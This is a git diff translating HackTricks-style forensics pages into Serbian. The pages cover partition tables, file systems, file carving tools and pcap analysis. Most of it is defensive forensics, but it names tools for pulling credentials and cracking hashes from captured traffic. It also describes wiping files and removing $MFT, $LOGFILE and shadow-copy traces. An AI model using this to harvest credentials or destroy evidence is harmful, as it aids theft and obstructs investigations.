+| 80 (0x50) | 4 bajta  | Broj unosa particija u nizu                                                                                                                                         |
+| 84 (0x54) | 4 bajta  | Veličina jednog unosa particije (obično 80h ili 128)                                                                                                                        |
+| 88 (0x58) | 4 bajta  | CRC32 niza unosa particija u little endian                                                                                                                            |
+| 92 (0x5C) | \*       | Rezervisano; mora biti nule za ostatak bloka (420 bajta za veličinu sektora od 512 bajta; ali može biti više sa većim veličinama sektora)                                      |
 
-**Partition entries (LBA 2–33)**
+**Unosi particija (LBA 2–33)**
 
-| GUID partition entry format |          |                                                                                                               |
+| Format unosa GUID particije |          |                                                                                                               |
 | --------------------------- | -------- | ------------------------------------------------------------------------------------------------------------- |
-| Offset                      | Length   | Contents                                                                                                      |
-| 0 (0x00)                    | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) (mixed endian) |
-| 16 (0x10)                   | 16 bytes | Unique partition GUID (mixed endian)                                                                          |
-| 32 (0x20)                   | 8 bytes  | First LBA ([little endian](https://en.wikipedia.org/wiki/Little_endian))                                      |
-| 40 (0x28)                   | 8 bytes  | Last LBA (inclusive, usually odd)                                                                             |
-| 48 (0x30)                   | 8 bytes  | Attribute flags (e.g. bit 60 denotes read-only)                                                               |
-| 56 (0x38)                   | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units)                               |
+| Offset                      | Length   | Sadržaj                                                                                                      |
+| 0 (0x00)                    | 16 bajta | [GUID tipa particije](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) (mešovit endian) |
+| 16 (0x10)                   | 16 bajta | Jedinstveni GUID particije (mešovit endian)                                                                          |
+| 32 (0x20)                   | 8 bajta  | Prvi LBA ([little endian](https://en.wikipedia.org/wiki/Little_endian))                                      |
+| 40 (0x28)                   | 8 bajta  | Poslednji LBA (uključivo, obično neparan)                                                                             |
+| 48 (0x30)                   | 8 bajta  | Zastavice atributa (npr. bit 60 označava samo za čitanje)                                                               |
+| 56 (0x38)                   | 72 bajta | Ime particije (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE kodnih jedinica)                               |
 
-**Partitions Types**
+**Tipovi particija**
 
 ![](<../../../images/image (492).png>)
 
-More partition types in [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
+Više tipova particija na [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
 
-### Inspecting
+### Istraživanje
 
-After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image an **MBR** was detected on the **sector 0** and interpreted:
+Nakon montiranja forenzičke slike sa [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), možete ispitati prvi sektor koristeći Windows alat [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** Na sledećoj slici je otkriven **MBR** na **sektoru 0** i interpretiran:
 
 ![](<../../../images/image (494).png>)
 
-If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
+Ako je to bila **GPT tabela umesto MBR-a**, trebala bi se pojaviti oznaka _EFI PART_ u **sektoru 1** (koji je na prethodnoj slici prazan).
 
-## File-Systems
+## Sistemi datoteka
 
-### Windows file-systems list
+### Lista Windows sistema datoteka
 
 - **FAT12/16**: MSDOS, WIN95/98/NT/200
 - **FAT32**: 95/2000/XP/2003/VISTA/7/8/10
@@ -151,49 +149,49 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI
 
 ### FAT
 
-The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process.
+**FAT (Tabela alokacije datoteka)** sistem datoteka je dizajniran oko svoje osnovne komponente, tabele alokacije datoteka, koja se nalazi na početku volumena. Ovaj sistem štiti podatke održavanjem **dvije kopije** tabele, osiguravajući integritet podataka čak i ako je jedna oštećena. Tabela, zajedno sa korenskim folderom, mora biti na **fiksnoj lokaciji**, što je ključno za proces pokretanja sistema.
 
-The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions:
+Osnovna jedinica skladištenja sistema datoteka je **klaster, obično 512B**, koji se sastoji od više sektora. FAT se razvijao kroz verzije:
 
-- **FAT12**, supporting 12-bit cluster addresses and handling up to 4078 clusters (4084 with UNIX).
-- **FAT16**, enhancing to 16-bit addresses, thereby accommodating up to 65,517 clusters.
-- **FAT32**, further advancing with 32-bit addresses, allowing an impressive 268,435,456 clusters per volume.
+- **FAT12**, podržava 12-bitne adrese klastera i obrađuje do 4078 klastera (4084 sa UNIX-om).
+- **FAT16**, unapređuje na 16-bitne adrese, čime se omogućava do 65,517 klastera.
+- **FAT32**, dodatno napreduje sa 32-bitnim adresama, omogućavajući impresivnih 268,435,456 klastera po volumenu.
 
-A significant limitation across FAT versions is the **4GB maximum file size**, imposed by the 32-bit field used for file size storage.
+Značajno ograničenje kod FAT verzija je **maksimalna veličina datoteke od 4GB**, koju nameće 32-bitno polje korišćeno za skladištenje veličine datoteke.
 
-Key components of the root directory, particularly for FAT12 and FAT16, include:
+Ključne komponente korenskog direktorijuma, posebno za FAT12 i FAT16, uključuju:
 
-- **File/Folder Name** (up to 8 characters)
-- **Attributes**
-- **Creation, Modification, and Last Access Dates**
-- **FAT Table Address** (indicating the start cluster of the file)
-- **File Size**
+- **Ime datoteke/foldera** (do 8 karaktera)
+- **Atributi**
+- **Datumi kreiranja, modifikacije i poslednjeg pristupa**
+- **Adresa FAT tabele** (koja označava početni klaster datoteke)
+- **Veličina datoteke**
 
 ### EXT
 
-**Ext2** is the most common file system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**.
+**Ext2** je najčešći sistem datoteka za **ne-journaled** particije (**particije koje se ne menjaju mnogo**) kao što je boot particija. **Ext3/4** su **journaled** i obično se koriste za **ostale particije**.
 
-## **Metadata**
+## **Metapodaci**
 
-Some files contain metadata. This information is about the content of the file which sometimes might be interesting to an analyst as depending on the file type, it might have information like:
+Neke datoteke sadrže metapodatke. Ove informacije se odnose na sadržaj datoteke koji ponekad može biti zanimljiv analitičaru jer, u zavisnosti od tipa datoteke, može sadržati informacije kao što su:
 
-- Title
-- MS Office Version used
-- Author
-- Dates of creation and last modification
-- Model of the camera
-- GPS coordinates
-- Image information
+- Naslov
+- Verzija MS Office-a koja se koristi
+- Autor
+- Datumi kreiranja i poslednje modifikacije
+- Model kamere
+- GPS koordinate
+- Informacije o slici
 
-You can use tools like [**exiftool**](https://exiftool.org) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file.
+Možete koristiti alate kao što su [**exiftool**](https://exiftool.org) i [**Metadiver**](https://www.easymetadata.com/metadiver-2/) da dobijete metapodatke datoteke.
 
-## **Deleted Files Recovery**
+## **Oporavak obrisanih datoteka**
 
-### Logged Deleted Files
+### Zabeležene obrisane datoteke
 
-As was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file system just marks it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files (like the MFT) and find the deleted files.
+Kao što je ranije viđeno, postoji nekoliko mesta gde je datoteka još uvek sačuvana nakon što je "obrisana". To je zato što obično brisanje datoteke iz sistema datoteka samo označava da je obrisana, ali podaci nisu dodirnuti. Tada je moguće ispitati registre datoteka (kao što je MFT) i pronaći obrisane datoteke.
 
-Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible.
+Takođe, OS obično čuva mnogo informacija o promenama u sistemu datoteka i rezervnim kopijama, tako da je moguće pokušati koristiti ih za oporavak datoteke ili što više informacija.
 
 {{#ref}}
 file-data-carving-recovery-tools.md
@@ -201,11 +199,11 @@ file-data-carving-recovery-tools.md
 
 ### **File Carving**
 
-**File carving** is a technique that tries to **find files in the bulk of data**. There are 3 main ways tools like this work: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself.
+**File carving** je tehnika koja pokušava da **pronađe datoteke u masi podataka**. Postoje 3 glavna načina na koje alati poput ovog funkcionišu: **Na osnovu zaglavlja i podnožja tipova datoteka**, na osnovu **struktura** tipova datoteka i na osnovu **sadržaja** same datoteke.
 
-Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it.
+Napomena da ova tehnika **ne funkcioniše za vraćanje fragmentisanih datoteka**. Ako datoteka **nije smeštena u kontiguitetne sektore**, tada ova tehnika neće moći da je pronađe ili barem deo nje.
 
-There are several tools that you can use for file Carving indicating the file types you want to search for
+Postoji nekoliko alata koje možete koristiti za file carving koji označavaju tipove datoteka koje želite da pretražujete.
 
 {{#ref}}
 file-data-carving-recovery-tools.md
@@ -213,24 +211,24 @@ file-data-carving-recovery-tools.md
 
 ### Data Stream **C**arving
 
-Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\
-For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs.
+Data Stream Carving je sličan File Carving-u, ali **umesto da traži kompletne datoteke, traži zanimljive fragmente** informacija.\
+Na primer, umesto da traži kompletnu datoteku koja sadrži zabeležene URL-ove, ova tehnika će tražiti URL-ove.
 
 {{#ref}}
 file-data-carving-recovery-tools.md
 {{#endref}}
 
-### Secure Deletion
+### Sigurno brisanje
 
-Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\
-You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them.
+Očigledno, postoje načini da se **"sigurno" obrišu datoteke i deo logova o njima**. Na primer, moguće je **prepisati sadržaj** datoteke sa smešnim podacima nekoliko puta, a zatim **ukloniti** **logove** iz **$MFT** i **$LOGFILE** o datoteci, i **ukloniti kopije senki volumena**.\
+Možda ćete primetiti da čak i kada se ta akcija izvrši, može postojati **drugi delovi gde je postojanje datoteke još uvek zabeleženo**, i to je tačno, a deo posla forenzičkog stručnjaka je da ih pronađe.
 
-## References
+## Reference
 
 - [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
 - [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm)
 - [https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html](https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html)
 - [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service)
-- **iHackLabs Certified Digital Forensics Windows**
+- **iHackLabs Sertifikovani Digitalni Forenzik Windows**
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
index cd9e13a58..8ba8ba655 100644
--- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
+++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
@@ -2,94 +2,86 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Carving & Recovery tools
+## Alati za carving i oporavak
 
-More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
+Više alata na [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
 
 ### Autopsy
 
-The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kinds of images, but not simple files.
+Najčešće korišćen alat u forenzici za ekstrakciju fajlova iz slika je [**Autopsy**](https://www.autopsy.com/download/). Preuzmite ga, instalirajte i omogućite mu da unese fajl kako bi pronašao "sakrivene" fajlove. Imajte na umu da je Autopsy napravljen da podržava disk slike i druge vrste slika, ali ne i obične fajlove.
 
 ### Binwalk 
 
-**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk).
-
-**Useful commands**:
+**Binwalk** je alat za analizu binarnih fajlova radi pronalaženja ugrađenog sadržaja. Može se instalirati putem `apt`, a njegov izvor je na [GitHub](https://github.com/ReFirmLabs/binwalk).
 
+**Korisne komande**:
 ```bash
 sudo apt install binwalk #Insllation
 binwalk file #Displays the embedded data in the given file
 binwalk -e file #Displays and extracts some files from the given file
 binwalk --dd ".*" file #Displays and extracts all files from the given file
 ```
-
 ### Foremost
 
-Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for its default configured file types.
-
+Još jedan uobičajen alat za pronalaženje skrivenih fajlova je **foremost**. Možete pronaći konfiguracioni fajl foremost-a u `/etc/foremost.conf`. Ako želite da pretražujete samo neke specifične fajlove, otkomentarišite ih. Ako ne otkomentarišete ništa, foremost će pretraživati svoje podrazumevane konfiguracione tipove fajlova.
 ```bash
 sudo apt-get install foremost
 foremost -v -i file.img -o output
 #Discovered files will appear inside the folder "output"
 ```
-
 ### **Scalpel**
 
-**Scalpel** is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
-
+**Scalpel** je još jedan alat koji se može koristiti za pronalaženje i ekstrakciju **datoteka ugrađenih u datoteku**. U ovom slučaju, potrebno je da odkomentarišete tipove datoteka iz konfiguracione datoteke (_/etc/scalpel/scalpel.conf_) koje želite da ekstraktujete.
 ```bash
 sudo apt-get install scalpel
 scalpel file.img -o output
 ```
-
 ### Bulk Extractor
 
-This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
-
-This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do:
+Ovaj alat dolazi unutar kali, ali ga možete pronaći ovde: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
 
+Ovaj alat može skenirati sliku i **izvući pcaps** unutar nje, **mrežne informacije (URL-ovi, domene, IP adrese, MAC adrese, e-mailovi)** i još **datoteka**. Samo treba da uradite:
 ```
 bulk_extractor memory.img -o out_folder
 ```
-
-Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
+Navigirajte kroz **sve informacije** koje je alat prikupio (lozinke?), **analizirajte** **pakete** (pročitajte [**analizu Pcaps**](../pcap-inspection/)), pretražujte **čudne domene** (domene povezane sa **malverom** ili **nepostojećim**).
 
 ### PhotoRec
 
-You can find it in [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
+Možete ga pronaći na [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
 
-It comes with GUI and CLI versions. You can select the **file-types** you want PhotoRec to search for.
+Dolazi sa GUI i CLI verzijama. Možete odabrati **tipove fajlova** koje želite da PhotoRec pretražuje.
 
 ![](<../../../images/image (524).png>)
 
 ### binvis
 
-Check the [code](https://code.google.com/archive/p/binvis/) and the [web page tool](https://binvis.io/#/).
+Proverite [kod](https://code.google.com/archive/p/binvis/) i [web stranicu alata](https://binvis.io/#/).
 
-#### Features of BinVis
+#### Karakteristike BinVis
 
-- Visual and active **structure viewer**
-- Multiple plots for different focus points
-- Focusing on portions of a sample
-- **Seeing stings and resources**, in PE or ELF executables e. g.
-- Getting **patterns** for cryptanalysis on files
-- **Spotting** packer or encoder algorithms
-- **Identify** Steganography by patterns
-- **Visual** binary-diffing
+- Vizuelni i aktivni **pregledač strukture**
+- Više grafika za različite tačke fokusa
+- Fokusiranje na delove uzorka
+- **Prikazivanje stringova i resursa**, u PE ili ELF izvršnim datotekama npr.
+- Dobijanje **šablona** za kriptoanalizu na fajlovima
+- **Prepoznavanje** pakera ili enkodera
+- **Identifikacija** steganografije po šablonima
+- **Vizuelno** binarno upoređivanje
 
-BinVis is a great **start-point to get familiar with an unknown target** in a black-boxing scenario.
+BinVis je odlična **polazna tačka za upoznavanje sa nepoznatim ciljem** u scenariju crne kutije.
 
-## Specific Data Carving Tools
+## Specifični alati za vađenje podataka
 
 ### FindAES
 
-Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
+Pretražuje AES ključeve tražeći njihove rasporede ključeva. Sposoban je da pronađe 128, 192 i 256 bitne ključeve, kao što su oni koje koriste TrueCrypt i BitLocker.
 
-Download [here](https://sourceforge.net/projects/findaes/).
+Preuzmite [ovde](https://sourceforge.net/projects/findaes/).
 
-## Complementary tools
+## Komplementarni alati
 
-You can use [**viu** ](https://github.com/atanunq/viu)to see images from the terminal.\
-You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
+Možete koristiti [**viu**](https://github.com/atanunq/viu) da vidite slike iz terminala.\
+Možete koristiti linux komandnu liniju alat **pdftotext** da transformišete pdf u tekst i pročitate ga.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
index f076c885c..a0a780c8c 100644
--- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
+++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
@@ -1,74 +1,66 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-# Carving tools
+# Alati za carving
 
 ## Autopsy
 
-The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files.
+Najčešći alat korišćen u forenzici za ekstrakciju fajlova iz slika je [**Autopsy**](https://www.autopsy.com/download/). Preuzmite ga, instalirajte i omogućite mu da obradi fajl kako bi pronašao "sakrivene" fajlove. Imajte na umu da je Autopsy napravljen da podržava disk slike i druge vrste slika, ali ne i jednostavne fajlove.
 
 ## Binwalk 
 
-**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data.  
-It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github.  
-**Useful commands**:
-
+**Binwalk** je alat za pretraživanje binarnih fajlova kao što su slike i audio fajlovi za ugrađene fajlove i podatke. 
+Može se instalirati pomoću `apt`, međutim [izvor](https://github.com/ReFirmLabs/binwalk) se može pronaći na github-u. 
+**Korisne komande**:
 ```bash
 sudo apt install binwalk #Insllation
 binwalk file #Displays the embedded data in the given file
 binwalk -e file #Displays and extracts some files from the given file
 binwalk --dd ".*" file #Displays and extracts all files from the given file
 ```
-
 ## Foremost
 
-Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types.
-
+Još jedan uobičajen alat za pronalaženje skrivenih fajlova je **foremost**. Možete pronaći konfiguracioni fajl foremost-a u `/etc/foremost.conf`. Ako želite da pretražujete samo neke specifične fajlove, otkomentarišite ih. Ako ne otkomentarišete ništa, foremost će pretraživati svoje podrazumevane konfiguracione tipove fajlova.
 ```bash
 sudo apt-get install foremost
 foremost -v -i file.img -o output
 #Discovered files will appear inside the folder "output"
 ```
-
 ## **Scalpel**
 
-**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file \(_/etc/scalpel/scalpel.conf_\) the file types you want it to extract.
-
+**Scalpel** je još jedan alat koji se može koristiti za pronalaženje i ekstrakciju **datoteka ugrađenih u datoteku**. U ovom slučaju, potrebno je da odkomentarišete tipove datoteka iz konfiguracione datoteke \(_/etc/scalpel/scalpel.conf_\) koje želite da ekstraktujete.
 ```bash
 sudo apt-get install scalpel
 scalpel file.img -o output
 ```
-
 ## Bulk Extractor
 
-This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
-
-This tool can scan an image and will **extract pcaps** inside it, **network information\(URLs, domains, IPs, MACs, mails\)** and more **files**. You only have to do:
+Ovaj alat dolazi unutar kali, ali ga možete pronaći ovde: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor)
 
+Ovaj alat može skenirati sliku i **izvući pcaps** unutar nje, **mrežne informacije (URL-ovi, domene, IP adrese, MAC adrese, e-mailovi)** i još **datoteka**. Samo treba da uradite:
 ```text
 bulk_extractor memory.img -o out_folder
 ```
-
-Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\).
+Navigirajte kroz **sve informacije** koje je alat prikupio \(lozinke?\), **analizirajte** **pakete** \(pročitajte [ **analizu Pcaps**](../pcap-inspection/)\), pretražujte **čudne domene** \(domene povezane sa **malverom** ili **nepostojećim**\).
 
 ## PhotoRec
 
-You can find it in [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
+Možete ga pronaći na [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
 
-It comes with GUI and CLI version. You can select the **file-types** you want PhotoRec to search for.
+Dolazi sa GUI i CLI verzijom. Možete odabrati **tipove fajlova** koje želite da PhotoRec pretražuje.
 
 ![](../../../images/image%20%28524%29.png)
 
-# Specific Data Carving Tools
+# Specifični alati za vađenje podataka
 
 ## FindAES
 
-Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
+Pretražuje AES ključeve pretražujući njihove rasporede ključeva. Sposoban je da pronađe 128, 192 i 256 bitne ključeve, kao što su oni koje koriste TrueCrypt i BitLocker.
 
-Download [here](https://sourceforge.net/projects/findaes/).
+Preuzmite [ovde](https://sourceforge.net/projects/findaes/).
 
-# Complementary tools
+# Dodatni alati
 
-You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal.  
-You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
+Možete koristiti [**viu** ](https://github.com/atanunq/viu) da vidite slike iz terminala. 
+Možete koristiti linux komandnu liniju **pdftotext** da transformišete pdf u tekst i pročitate ga.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/README.md b/src/forensics/basic-forensic-methodology/pcap-inspection/README.md
index 9e6ebd08d..941ba753b 100644
--- a/src/forensics/basic-forensic-methodology/pcap-inspection/README.md
+++ b/src/forensics/basic-forensic-methodology/pcap-inspection/README.md
@@ -1,32 +1,26 @@
-# Pcap Inspection
+# Pcap Inspekcija
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
 > [!NOTE]
-> A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools.
+> Napomena o **PCAP** vs **PCAPNG**: postoje dve verzije PCAP formata datoteka; **PCAPNG je noviji i nije podržan od svih alata**. Možda ćete morati da konvertujete datoteku iz PCAPNG u PCAP koristeći Wireshark ili neki drugi kompatibilni alat, kako biste mogli da radite s njom u nekim drugim alatima.
 
-## Online tools for pcaps
+## Online alati za pcaps
 
-- If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
-- Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com)
-- Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
+- Ako je zaglavlje vašeg pcap-a **pokvareno**, trebali biste pokušati da ga **popravite** koristeći: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
+- Ekstrahujte **informacije** i tražite **malver** unutar pcap-a u [**PacketTotal**](https://packettotal.com)
+- Tražite **malicioznu aktivnost** koristeći [**www.virustotal.com**](https://www.virustotal.com) i [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
 
-## Extract Information
+## Ekstrakcija informacija
 
-The following tools are useful to extract statistics, files, etc.
+Sledeći alati su korisni za ekstrakciju statistike, datoteka, itd.
 
 ### Wireshark
 
 > [!NOTE]
-> **If you are going to analyze a PCAP you basically must to know how to use Wireshark**
+> **Ako planirate da analizirate PCAP, osnovno je da znate kako da koristite Wireshark**
 
-You can find some Wireshark tricks in:
+Možete pronaći neke Wireshark trikove u:
 
 {{#ref}}
 wireshark-tricks.md
@@ -34,111 +28,93 @@ wireshark-tricks.md
 
 ### Xplico Framework
 
-[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
-
-**Install**
+[**Xplico** ](https://github.com/xplico/xplico)_(samo linux)_ može **analizirati** **pcap** i ekstraktovati informacije iz njega. Na primer, iz pcap datoteke Xplico, ekstraktuje svaku email poruku (POP, IMAP i SMTP protokoli), sav HTTP sadržaj, svaki VoIP poziv (SIP), FTP, TFTP, itd.
 
+**Instalirajte**
 ```bash
 sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
 sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE
 sudo apt-get update
 sudo apt-get install xplico
 ```
-
-**Run**
-
+**Pokreni**
 ```
 /etc/init.d/apache2 restart
 /etc/init.d/xplico start
 ```
+Pristupite _**127.0.0.1:9876**_ sa kredencijalima _**xplico:xplico**_
 
-Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_
-
-Then create a **new case**, create a **new session** inside the case and **upload the pcap** file.
+Zatim kreirajte **novi slučaj**, kreirajte **novu sesiju** unutar slučaja i **otpremite pcap** datoteku.
 
 ### NetworkMiner
 
-Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\
-This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening in a **quicker** way.
+Kao Xplico, to je alat za **analizu i ekstrakciju objekata iz pcaps**. Ima besplatnu verziju koju možete **preuzeti** [**ovde**](https://www.netresec.com/?page=NetworkMiner). Radi sa **Windows**.\
+Ovaj alat je takođe koristan za dobijanje **druge analizirane informacije** iz paketa kako biste mogli brže saznati šta se dešava.
 
 ### NetWitness Investigator
 
-You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
-This is another useful tool that **analyses the packets** and sorts the information in a useful way to **know what is happening inside**.
+Možete preuzeti [**NetWitness Investigator odavde**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Radi na Windows)**.\
+Ovo je još jedan koristan alat koji **analizira pakete** i sortira informacije na koristan način da **znate šta se dešava unutra**.
 
 ### [BruteShark](https://github.com/odedshimon/BruteShark)
 
-- Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...)
-- Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
-- Build a visual network diagram (Network nodes & users)
-- Extract DNS queries
-- Reconstruct all TCP & UDP Sessions
+- Ekstrakcija i kodiranje korisničkih imena i lozinki (HTTP, FTP, Telnet, IMAP, SMTP...)
+- Ekstrakcija autentifikacionih hash-ova i njihovo razbijanje koristeći Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
+- Izrada vizuelnog dijagrama mreže (Mrežni čvorovi i korisnici)
+- Ekstrakcija DNS upita
+- Rekonstrukcija svih TCP i UDP sesija
 - File Carving
 
 ### Capinfos
-
 ```
 capinfos capture.pcap
 ```
-
 ### Ngrep
 
-If you are **looking** for **something** inside the pcap you can use **ngrep**. Here is an example using the main filters:
-
+Ako **tražite** **nešto** unutar pcap-a, možete koristiti **ngrep**. Evo primera koji koristi glavne filtre:
 ```bash
 ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
 ```
+### Isečenje
 
-### Carving
-
-Using common carving techniques can be useful to extract files and information from the pcap:
+Korišćenje uobičajenih tehnika isečenja može biti korisno za ekstrakciju fajlova i informacija iz pcap:
 
 {{#ref}}
 ../partitions-file-systems-carving/file-data-carving-recovery-tools.md
 {{#endref}}
 
-### Capturing credentials
+### Hvatanje kredencijala
 
-You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface.
